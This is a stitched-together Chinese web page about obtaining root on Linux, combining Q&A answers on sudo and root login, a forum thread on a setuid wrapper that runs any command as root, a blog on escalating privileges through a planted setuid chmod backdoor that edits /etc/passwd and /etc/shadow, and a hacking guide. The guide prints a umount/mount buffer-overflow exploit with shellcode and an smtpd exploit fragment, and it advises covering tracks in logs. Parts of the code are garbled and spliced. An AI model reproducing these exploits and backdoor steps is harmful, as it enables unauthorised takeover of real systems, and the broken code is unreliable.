linux 下 360超级root权限下载是什么样的

怎么样才能进入Linux终端后就是root权限?_百度知道
怎么样才能进入Linux终端后就是root权限?
我有更好的答案
  方法:  1:Redhat系统或者Fedora或者CentOs的Linux发行版,那么在Linux终端输入命令回车:  su - root  这样就可以切换到root权限了  2:Ubuntu系统,在Linux终端输入命令回车:  sudo su - root  然后这样也可以切换到root权限了.
专业电脑维护
你也不说说你是啥linux,估计是ubuntu吧:
Ubuntu分配修改登陆root用户管理权限的方法 Ubuntu 有一个与众不同的特点,那就是初次使用时,你无法作为root来登录系统,为什么会这样?这就要从系统的安装说起。对于其他Linux系统来说,一般在安装过程就设定root密码,这样用户就能用它登录root帐户或使用su命令转换到超级用户身份。与之相反,Ubuntu默认安装时,并没有给root用户设置口令,也没有启用root帐户。问题是要想作为root用户来运行命令该怎么办呢?没关系,我们可以使用sudo命令达此目的。
sudo是linux下常用的允许普通用户使用超级用户权限的工具,该命令为管理员提供了一种细颗粒度的访问控制方法,通过它人们既可以作为超级用户又可以作为其它类型的用户来访问系统。这样做的好处是,管理员能够在不告诉用户root密码的前提下,授予他们某些特定类型的超级用户权限,这正是许多系统管理员所梦寐以求的。
设置分配很简单,只要为root设置一个root密码就行了: $ sudopasswd root
之后会提示要输入root用户的密码,连续输入root密码,再使用:$ su
就可以切换成超级管理员用户登陆了!
1. 在终端执行 sudo passwd root 指令后,系统将会提示你设置一个新的 root 帐号密码。
su root 进入root帐号
2. 点击 System(系统)- 系统管理 - LoginWindow(登入窗口) 菜单,并切换到 Security(安全) 选项页,然后选中其下的“Allow local systemadministrator login”选项。 执行上述两步后,你便可以使用 root 帐号登录 Ubuntu 系统了。
如果要再次禁用 root 帐号,那么可以执行 sudo passwd -l root。
=========================== 方法二: 在Ubuntu中用root帐号登录
其实我个人认为这没有多大必要,因为当你需要 root 的权限时,使用 sudo 便可以了。如果你实在需要在 Ubuntu 中启用root 帐号的话,那么不妨执行下面的操作:
1.重新设置 root 的密码:
$sudo passwd root #按照提示输入两次新的密码,并加以确认。
2.启用root用户登录:
$sudo vi /etc/gdm/gdm.conf #
打开gnome的配置文件,在末行模式中输入:AllowRoot回车,找到AllowRoot=false,把false改为true,保存后退出。
之后,重启系统时,就可以用 root 登录了。如果你想要禁用 root 帐号,则执行下列命令:
$sudo passwd -l root
Ubuntu 中的 root 帐号默认是被禁用了的。在这种情况之下,如果你想要使用 root 的权限来干些事情,就需要 sudo指令。对某些朋友
来说,他们可能需要激活 Ubuntu 中的 root 帐号
本回答被提问者采纳
为您推荐:
其他类似问题
您可能关注的内容
root权限的相关知识
换一换
回答问题,赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。查看: 5942|回复: 6
Linux下获取root权限的c程序
TA的每日心情慵懒 14:53签到天数: 46 天[LV.5]常住居民I
本帖最后由 penghuan 于
11:21 编辑
当你想要执行一个需要root权限的脚本时,你通常的做法是什么样的呢,如:ls /root复制代码你会得到如下输出:
下面给出一种不需要输入密码就能执行root权限脚本的方法#include &stdio.h&
#include &stdlib.h&
#include &unistd.h&
#define BUFFSIZE 1024
int main(int argc, char *argv[]){
& && &&&char *cmd = malloc(BUFFSIZE);
& && &&&setuid(geteuid());
& && &&&setgid(getegid());
& && &&&cmd = argv[1];
& && &&&int i = 0;
& && &&&for(i = 0;i & argc - 1;i++) {
& && && && && & argv[i] = argv[i+1];
& && &&&}
& && &&&if(execvp(cmd, argv)){
& && && && && & printf(&error&);
& && && && && & free(cmd);
& && && && && & exit(1);
& && &&&}
& && &&&free(cmd);
}
复制代码然后进行如下操作:gcc -o transeuid transeuis.c
sudo chown root:root transeuid
sudo chmod +s transeuid复制代码接着调用transeuid来执行ls /root./transeuid ls /root复制代码就能看到/root下内容了
本帖子中包含更多资源
才可以下载或查看,没有帐号?
该用户从未签到
说句俗话,这个行为简直是脱裤子放屁。。
TA的每日心情慵懒 14:53签到天数: 46 天[LV.5]常住居民I
采姑娘的小蘑菇 发表于
说句俗话,这个行为简直是脱裤子放屁。。
特定的情况下,没有交互让你输密码,你通常怎么做?
TA的每日心情奋斗 08:39签到天数: 445 天[LV.9]以坛为家II
在补个ubuntu获取root权限的方法&&很多用户可能发现ubuntu没给root权限&&但是sudo命令的权限却是ALL即用sudo能执行root指令&&因此 我们可以用 sudo&&passwd root来修改root用户的密码&&你就可以使用root了
该用户从未签到
penghuan 发表于
特定的情况下,没有交互让你输密码,你通常怎么做?
1.既然过程中你用了sudo,为什么不直接配置sudo为nopassword?
2.假如不用sudo,也不用输密码,我就会直接修改/etc/passwd文件,把用户uid改为0.
3.假如上面两个都不想用,我还可以添加一个无密码的root用户,需要时直接su即可
4.你有没有用你的程序去运行/bin/sh -x xx.sh试一下?
TA的每日心情慵懒 14:53签到天数: 46 天[LV.5]常住居民I
本帖最后由 penghuan 于
14:26 编辑
采姑娘的小蘑菇 发表于
1.既然过程中你用了sudo,为什么不直接配置sudo为nopassword?
2.假如不用sudo,也不用输密码,我就会直 ...
按你的说法,直接用root用户登录就可以了,还搞那么多操作干嘛?
注意我这些代码的时效性,只针对当前使用它的程序有用,其他程序是没有的
我这个程序想说的是:当你的程序涉及到一些后台操作,这些后台操作需要root权限,这个时候你就可以在后台操作中加入这些提权的代码来直接使用root权限而避开密码交互
你上面的这些操作是完全放开了root,什么人想怎么操作都可以,显然是有很大问题的
而且你这样的做法,对应用的部署来说根本没用,难道你还让每个部署了你的应用的用户都按你的方式来改他们的系统配置?
针对第4点,你需要./transeuid sudo /bin/sh -x xxx.sh复制代码
TA的每日心情慵懒 14:53签到天数: 46 天[LV.5]常住居民I
给应用提权,还有一种比较好的方法是将这个应用做成服务的形式随系统启动而启动,这样该应用所有涉及到root权限的操作都不需要密码交互
& Ubuntu Kylin. All Rights Reserved .Linux下普通用户提升为root权限_大棟哥_新浪博客
Linux下普通用户提升为root权限
前提条件是在root用户下将chmod赋予s权限;
&0x01方案一:
切换到普通用户,以普通用户JD为例:
查找chmod所在的目录文件并查看chmod的权限:
which chmod
ls -al /bin/chmod
&1
查找vim所在的目录文件,并查看其权限:
可以看到vim所属用户具有所有权限,对于群组和其他人具有可读可执行的权限
找到要修改的文件,并查看其权限:
可以看到passwd所属root用户和root组,普通用户对其只有可读的权限:
可以看到在普通用户下对其编辑的时候提示:正在改变一个只读文件,因此对其编辑不了:
接下来就要对这个文件赋予其他人对其可写的权限:
chmod o+w /etc/passwd
注意观察其他人对其拥有的权限:
对其进行编辑(已经不会出现提示警告了)将普通用户JD的UID和GID改为和root用户一样!
&6
普通用户权限变更完成,发现什么不一样了吗?
0x02第二种方案:
前提条件一样,同样留了chmod的s后门,切换到普通用户下:
/etc/shadow目录查看其文件权限:
对其进行增加权限chmod 006 /etc/shadow
对这个目录进行编辑,vim快捷键yy选中光标所在的一整行,选中root所在的一整行,o在末尾向下插入空白行,然后p复制,将前边的名字改为JD,找到原来的JD哪一行dd将其删除,注意:vim快捷方式是在命令行模式下使用!
释:/etc/shadow下保存的是用户密文密码,只有root用户有权查看:
保存退出,进行切换,普通用户权限改变为root权限!
0x03​总结
&这种通过将普通用户提升到root权限的做法,有一定的限制条件,必须有chmod后门,因此从普通用户​提升到root权限,前期的留后门才是问题之根本!
通过上述两种方法将普通用户提升权限之后,可以在主机之上以所有人的身份去执行所有的命令,任意操作!
&哦了,先就这么多吧、、、
业精于勤,荒于嬉,行成于思,毁于随!​-JD
博客等级:
博客积分:0
博客访问:10,375
关注人气:0
荣誉徽章:linux中root用户和普通用户的区别_百度知道
linux中root用户和普通用户的区别
特别是权限上都有哪些区别
我有更好的答案
root 用户在系统内是属于独一无二的超级管理员,(相当于windows 中的system最高权限)而普通用户在相关的操作中需要ROOT的许可。而root 用户可以拥有所有系统权限。就相当于一个国家的主&席
国家总&理一样,
权限不一样。
普通用户最主要的几个权限限制是什么,能举几个例子吗
普通用户最主要的几个权限
比方你在打系统补丁的时候,需要root权限,安装软件的时候,也要ROOT的权限,
采纳率:31%
root 是管理员 具有最高的权限,比如说删除文件,安装软件什么。普通用户只能管理自己的区域。而root 可以管理所有的。
已经说的很清楚了……
其他类似问题
您可能关注的内容
linux的相关知识
换一换
回答问题,赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。linux获取root权限:获取root账号 | 网站架构
linux获取root权限:获取root账号
如我前面所说大多数情况下你仅仅需要个帐号就行了如果你得不到系统root你可能会用它来和IRC迷换取其它帐号或些对你hacking有帮助信息.本章有足够帮助信息让你即使你得不到root帐户也可留着系统以后再用.你可以把帐号先放边把有关信息记录在些log文档中并做好备忘录以便以后当有新可利用漏洞被发现时你可以回忆起来:)
在你确信不会有失去帐号危险的前不要轻易进入系统记住:当你用个帐号Login而又没拿到root时你就无法清除日志文档(logs),这样该用户下次login时就会看到这样信息:
last login from xxx.com time:0:00 date:xx/xx/xx
--------------------------------------------------------------------------------
Bugs(些漏洞)
区别里都有很多Bug可利用来取得root权限.Bug可能是安装在系统上个游戏或者甚至是sendmail.如果他们没有定期升级你可以确信肯定可以入侵(即使现在不行也是很快就行).
我会在此提供些主要Exploit(这个词动词是"利用、使用、开发"意思"名词其实和bug意思差不多:译注)和Bugs其它不大常用则在附录里介绍.我会给你详细英文条款让你能取得系统root权限.但请务必在行动的前先完整阅读完下节和本手册以确定你以正确方式开始并且不会搞得在系统里呆得太久.
--------------------------------------------------------------------------------
Exploits(利用漏洞)
Umount/mount Exploit
在/bin目录下寻找名为Umount(或mount)文件如果你找不到用下面命令搜索:
find / -name umount -pr -dev
(你可用同样方式寻找任何文件)
进入该文件所在目录并且:ls -al um*
如果文件有SUID"s"标志你就可能拿到root.
SUID "s"使文件属主(这里是root)有rws权限你要寻找就是这个"s".
victim:/bin# ls -al um*
-rwsr-sr-x   1 root         8888 Mar 21  1995 umount
victim:/bin#
通过编译下面文件我们就可以拿到此机器root.
------ cut here
/* sno.c : Linux realpath exploit
 * Syntax: ./sno N
 *         mount $WOOT
 *    OR  umount $WOOT
 * N is some number which seems to dfer between 4 & 8,
your number is
 * too big, you will get a mount error,
it is too small, it will seg
 * fault.  Figure it out.  (Sometimes N=0 for mount)
 * If you use mount, first thing to do _disibledevent=>
   &\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f&
   &\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd&
   &\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh&;
   char *exec_ptr =
   r=atoi(argv[1]);
   ptr =
   memcpy(ptr,&WOOT=&,5); /*
environment variable to use */
   for(a=0;a&SIZE+4-strlen(execshell)-r;a)  /* pad front with NOPs */
      *(ptr) = 0x90;
   while (*exec_ptr)
      *(ptr) = *(exec_ptr);
   addr_ptr = (long *)
   *(addr_ptr) = get_esp+1139;  /* 0xbffffc01 */
   ptr = (char *) addr_
   *ptr = 0; /* must end with null
to terminate
   putenv(env);
   system(&/bin/mount $WOOT&);
----------- cut he_leshka.c;cc -o /tmp/smtpd smtpd.c
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs &[:digit:]& &\n&|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
------------ cut here
用chmod为文档加上运行权限(+x):
chmod +x sm.sh
1.运行此文件
2.它把你带到/tmp目录中
3.输入ls -al 看在那里是否有SUID sh 文件如果有用whoami看自己是否是root,如果是话就运行./sh文件这回你可看看你是不是root了;)
我会在附录里放更多脚本但目前这是取得linux和BSD上root权限最好思路方法如果你需要其它BSD里exploit(可利用漏洞)可试试附录里crontab exploit for BSD.
上篇文章: 给linux高手大鹰linux木马shell脚本例子改进版加上注解
下篇文章: 冰河通用密码及有关远程终端

我要回帖

更多关于 如何获取手机root 的文章

 

随机推荐